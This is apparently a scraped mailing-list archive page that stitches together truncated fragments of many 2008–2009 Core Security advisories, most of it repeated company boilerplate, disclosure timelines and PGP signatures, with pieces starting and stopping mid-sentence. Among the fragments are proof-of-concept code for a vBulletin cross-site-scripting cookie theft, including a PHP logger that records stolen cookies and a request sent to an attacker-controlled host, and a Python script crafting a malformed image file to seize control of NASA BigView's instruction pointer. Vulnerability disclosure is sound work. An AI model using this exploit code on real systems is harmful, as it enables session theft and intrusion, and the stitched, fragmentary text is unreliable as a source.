14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFJtXCwyNibggitWa0RAu8GAJ45qFT1lQnIKHD7TZEKcvKkSWtRegCfRHun pTg5BtPWfDaeHh/o0Jc//Cw= =M175 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2008-1009 - VNC Multiple Integer Overflows
functions:
. In the case of UltraVNC, in 'ClientConnection::Authenticate()'
. In the case of TightVNC, in 'ClientConnection::ReadFailureReason()'
To trigger the bug in the function 'ClientConnection::CheckBufferSize'
located in the file 'ClientConnection.cpp' (both vendors):
/---
(vncClient.cpp)
1848: void vncClient::UpdateClipText(LPSTR text)
1849: {
..
..
1858: rfbServerCutTextMsg message;
1860: message.length = Swap32IfLE(strlen(text));
1861: if (!SendRFBMsg(rfbServerCutText, (BYTE *) message, sizeof(message)))
1862: {
1863: Kill();
1864: return;
1865: }
1866: if (!m_socket-SendQueued(text, strlen(text)))
1867: {
1868: Kill();
1869: return;
1870: }
1871: }
..
- ---/
In line 1860 the 'message.length' structure must be modified to some
evil value like 0x.
9. *Report Timeline*
. 2009-01-09:
Core notifies the TightVNC team of the vulnerability.
. 2009-01-09:
Core notifies the UltraVNC team of the vulnerability.
. 2009-01-10:
The UltraVNC team asks Core for a technical description of the
vulnerability.
. 2009-01-12:
Core notifies the TightVNC team of the vulnerability. The previous email
sent by Core was rejected by the vendor email service.
. 2009-01-12:
Technical details sent to UltraVNC team by Core.
. 2009-01-14:
The TightVNC team asks Core for a technical description of the
vulnerability.
. 2009-01-14:
Technical details sent to TightVNC team by Core.
. 2009-01-21:
TightVNC team notifies Core that a fix has been produced, but the
release of the fixed version (TightVNC 1.3.10) will be available early
February. TightVNC team releases the fix for its SVN users [5].
. 2009-01-26:
Core asks TightVNC if the fixed version will be available on
02-Feb-2009. No reply received.
. 2009-01-26:
Core asks UltraVNC team if a fixed version is available.
. 2009-01-26:
UltraVNC team notifies Core that a fixed version will probably be
available on Feb 1st 2009.
. 2009-01-30:
Core notifies TightVNC and UltraVNC teams the advisory will be released
on Feb 3rd 2009, given that the vulnerability was already made public [5].
. 2009-02-02:
UltraVNC team notifies Core that a fix has been produced and will be
available to the users on Tuesday, Feb 3rd.
. 2009-02-02:
TightVNC team notifies Core that a patched version will be available to
the users on Tuesday, Feb 10th.
. 2009-02-03:
CORE-2008-1009 advisory is published.
10. *References*
[1] http://www.uvnc.com.
[2] http://www.tightvnc.com.
[3] http://www.realvnc.com.
[4] UltraVNC binary patches:
http://support1.uvnc.com/download/vncviewer_1054_w32.zip and
http://support1.uvnc.com/download/vncviewer_1054_X64.zip.
[5]
http://vnc-tight.svn.sourceforge.net/viewvc/vnc-tight?view=revrevision=3564.
11. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://www.coresecurity.com/corelabs.
12. *About Core Security Technologies*
Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
http://www.coresecurity.com.
13. *Disclaimer*
The contents of this advisory are copyright (c) 2009 Core Security
Technologies and (c) 2009 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.
14. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
iD8DBQFJiKUCyNibggitWa0RAvpmAJ0ckztpZ9PyAmA
[Full-disclosure] CORE-2008-1211: Amaya web editor XML and HTML parser vulnerabilities
); - ---/ This is not an exhaustive enumeration of the stack-based buffer overflows that can be found in Amaya. Remarkably, in the unpatched version, files 'html2thot.c' and 'xml2thot.c' contain many general purpose buffers defined as /--- char msgBuffer[MaxMsgLength] - ---/ and the length of buffers is generally not checked in the functions using them (i.e. 'strcpy', 'sprintf', etcetera). 9. *Report Timeline* . 2008-12-18: Core notifies the vendor of the vulnerability. . 2008-12-19: Vendor requests information about versions tested. . 2008-12-19: Core notifies the vendor that the vulnerability was tested on Amaya 11.0 and 10.0 (Windows XP). . 2008-12-29: Core offers to send the advisory draft to the vendor and offers to negotiate the publication date. . 2009-01-08: Core sends the advisory draft to the vendor. . 2009-01-09: Vendor informs that the bugs were fixed in the CVS version and will be included in version 11.1 by the end of January. . 2009-01-12: Core requests a more precise date. . 2009-01-14: Vendor suggest to publish the advisory on January 28th at the same time of release of Amaya 11.1. . 2009-01-14: Core confirms the vendor that advisory CORE-2008-1211 will be published on January 28th. . 2009-01-28: Core publishes advisory CORE-2008-1211. 10. *References* [1] Amaya Homepage http://www.w3.org/Amaya 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2009 Core Security Technologies and (c) 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFJgKLpyNibggitWa0RAmNOAKCT1Mxhe8VysinqBnwAtbuuhAaedgCeOWL6 DWuJPZIBvcK5lINLAJ2ylR8= =X9Dw -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2008-1128: Openfire multiple vulnerabilities
be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2009 Core Security Technologies and (c) 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.8 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iEYEARECAAYFAklmORMACgkQyNibggitWa35jgCbByp8LF4bUePcXG2YK1KEiV9G GYcAn3kpUOvc0f8N1TbJJufmRTCkgqxI =xHTF -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2008-1210: Qemu and KVM VNC server remote DoS
auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs. 10. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 11. *Disclaimer* The contents of this advisory are copyright (c) 2008 Core Security Technologies and (c) 2008 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 12. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.8 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iEYEARECAAYFAklPzrQACgkQyNibggitWa2ElACfWJ2ZtjYITJ/719IkhmXcgCW1 jGAAoKsijwqusZFBFsrKyIEtJxirZwJw =xCoI -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2008-0228: Microsoft Word Malformed FIB Arbitrary Free Vulnerability
, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs. 12. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2008 Core Security Technologies and (c) 2008 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.8 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iEYEARECAAYFAkk/32wACgkQyNibggitWa1twACfR4nlubY9KyYIN7ubBUnXlnm6 QgEAnRl3fbRhADlci+pJwDQGjrtj2bxs =hR/7 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2008-1127 - Vinagre show_error() format string vulnerability
security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2008 Core Security Technologies and (c) 2008 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFJPsvQyNibggitWa0RAoZHAJ9RQxrboOG+3oWfK4qH8pMoZEELHgCeOyVJ bVIpD2b1TEob7GKuEfmBAYs= =31Hp -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2008-0526: Adobe Reader Javascript Printf Buffer Overflow
be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2008 Core Security Technologies and (c) 2008 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.8 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iEYEARECAAYFAkkQc60ACgkQyNibggitWa2XmgCfQuemfRRpWnUOqIbJyR/Ioj4c YjwAn0A6hNouqD4CJI8hmRCnMPvENPRP =WCMf -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2008-0126: iPhone Safari JavaScript alert Denial of Service
consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2008 Core Security Technologies and (c) 2008 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFIyuMAyNibggitWa0RArBaAJ9NOuyo5DwXda571Ltra2BM4uZw+ACfYtCU 5pu4hSqtL8R+7syRM5nhnDQ= =i+Yt -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2008-0813 - vBulletin Cross Site Scripting Vulnerability
stealing - vBulletin 3.7.2 PL1 ==
//
// Using the first method described in
// http://www.securityfocus.com/archive/107/308433
//
// To bypass HttpOnly cookie restrictions - Works in IE 6 and lower
var XmlHttp = new ActiveXObject(Microsoft.XMLHTTP);
XmlHttp.open(GET,http://victim/vbStealer/logger.php,false);
XmlHttp.setRequestHeader(Host,attacker);
XmlHttp.send();
- ---/
and the 'logger.php' script file:
/---
?
// == XSS - Cookie stealing - vBulletin 3.7.2 PL1 ==
$all_cookies = ;
foreach ($_COOKIE as $cookie_name = $cookie_value) {
$all_cookies .= $cookie_name=$cookie_value, ;
}
rtrim($all_cookies, , );
file_put_contents(iplog.txt, COOKIES: .$all_cookies.\n, FILE_APPEND);
?
- ---/
*Report Timeline*
. 2008-08-14: Core Security Technologies notifies the vBulletin team of
the vulnerability.
. 2008-08-14: The vBulletin team asks Core for a technical description
of the vulnerability.
. 2008-08-14: Technical details sent to vBulletin team by Core.
. 2008-08-15: vBulletin notifies Core that a fix has been produced and
will be available to the users on Monday, August 18th.
. 2008-08-18: vBulletin releases patches for this flaw to its customers.
. 2008-08-20: The advisory CORE-2008-0813 is published.
*References*
[1] http://www.vbulletin.com/
[2] http://members.vbulletin.com/patches.php
[3] http://www.vbulletin.com/forum/showthread.php?t=282133
*About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://www.coresecurity.com/corelabs/.
*About Core Security Technologies*
Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
http://www.coresecurity.com.
*Disclaimer*
The contents of this advisory are copyright (c) 2008 Core Security
Technologies and (c) 2008 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.
*GPG/PGP Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
iD8DBQFIrJL6yNibggitWa0RAmBxAJ9Uv/c/+sexOIaFidUpqaJQA1IWRACfR1ec
VOXRyRPwvfp+3h/+QYmruTQ=
=J59u
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2008-0103: Internet Explorer Zone Elevation Restrictions Bypass and Security Zone Restrictions Bypass
system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs/. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. *Disclaimer* The contents of this advisory are copyright (c) 2008 Core Security Technologies and (c) 2008 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. *GPG/PGP Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.8 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iEYEARECAAYFAkijS5YACgkQyNibggitWa2QWQCfRF+fiW+V+J+aeCNHlLxctOGp S04AoKz5UU+RxTL+92J084/mw/ovWCD+ =5p6r -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2008-0716 - Sun xVM VirtualBox Privilege Escalation Vulnerability
, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs/. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. *Disclaimer* The contents of this advisory are copyright (c) 2008 Core Security Technologies and (c) 2008 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. *GPG/PGP Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFIl2jIyNibggitWa0RAtj0AJ9HSRe3Hq+SCqU0RfU2LwaxINL1NwCdH5p+ md6p6ZKbhrc7SfaD6EsxjoA= =kQyV -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2008-0125: CitectSCADA ODBC service vulnerability
, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs/. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. *Disclaimer* The contents of this advisory are copyright (c) 2008 Core Security Technologies and (c) 2008 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. *GPG/PGP Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.8 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iEYEARECAAYFAkhP2lEACgkQyNibggitWa29yQCdHfYtgLzOvys9Msi95eqF8H/X ADEAoKB9r52U9KXlEvBn5GgCaqXqC8OG =5qtX -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2008-0425 - NASA BigView Stack Buffer Overflow
::ppmHeader() doesn't return inmmediately, and we must modify internal variables to cause an overwrite of a C++ string destructor executed at the end of the function to gain control of EIP # PS.: Congrats for the Phoenix mars Lander! for i in range(7): w.write(chr(i)*4) w.write(AA) w.write(struct.pack(L,0x)) w.write(struct.pack(L,0x)) w.write(struct.pack(L,0x)) w.write(struct.pack(L,0x0808)) w.write(struct.pack(L,0x0808)*48) #The address of the destructor is hard-coded. Sorry but this is only a PoC! destination = 0x0805b294 # destructor value = 0x41414141 #address to jump to w.write(struct.pack(L,destination)) # destination w.write( %d 300 255 255 255 255 % value) w.close() - ---/ *Report Timeline* . 2008-04-24: Initial contact email sent by Core to BigView team setting the estimated publication date of the advisory to May 19th. . 2008-04-28: Vendor acknowledges the email notification. . 2008-04-30: Core sends the advisory draft to BigView support team. No reply received. . 2008-05-12: New email sent to BigView asking for a response. No reply received. . 2008-05-15: New email sent to BigView asking for a response. . 2008-05-15: BigView support team informs us that a new patched version is ready, but is not yet available via BigView webpage. . 2008-05-19: Core does not release the advisory (as planned). . 2008-05-19: New email sent to BigView team asking if the fixed version is available to the users. . 2008-05-26: New email sent to BigView team, refreshing the communications that took place, and asking for an answer. . 2008-06-02: Vendor responds that a tarball with fixes has been published on BigView's website. . 2008-06-03: Core sends the final version of the advisory to the BigView team. . 2008-06-04: CORE-2008-0425 advisory is published. *References* [1] http://opensource.arc.nasa.gov/project/bigview/ *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs/. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. *Disclaimer* The contents of this advisory are copyright (c) 2008 Core Security Technologies and (c) 2008 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. *GPG/PGP Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFIRu4lyNibggitWa0RAljKAJ4iVfRGNB6Hz+tA6DKFqpovws/cwACfSBFF a9ffEcKqAre7M1jXT9OpHOg= =UCFz -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2008-0126: Multiple vulnerabilities in iCal
security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. *Disclaimer* The contents of this advisory are copyright (c) 2008 Core Security Technologies and (c) 2008 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. *GPG/PGP Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFINH0iyNibggitWa0RAtdmAKCf4V+tks7RBYRRa2Bp9IT3LjBoQgCfeff8 PZO21gkXaFO1pAdxuViw2ys= =xZCy -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2008-0129 - Wonderware SuiteLink Denial of Service vulnerability
- Securing Industrial Control Systems http://www.wonderware.com/support/mmi/esupport/securitycentral/documents/BestPractices/WWSecGd041707_External.pdf *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs/. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. *Disclaimer* The contents of this advisory are copyright (c) 2008 Core Security Technologies and (c) 2008 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. *GPG/PGP Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFIH2eAyNibggitWa0RAtlcAKCgV83vS0v4aLVTRtFmkBsEg0UPXgCdHL4p si+I8mGJwJuglh+QESsZ9ZE= =705O -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2008-0326: NASA's Common Data Format buffer overflow
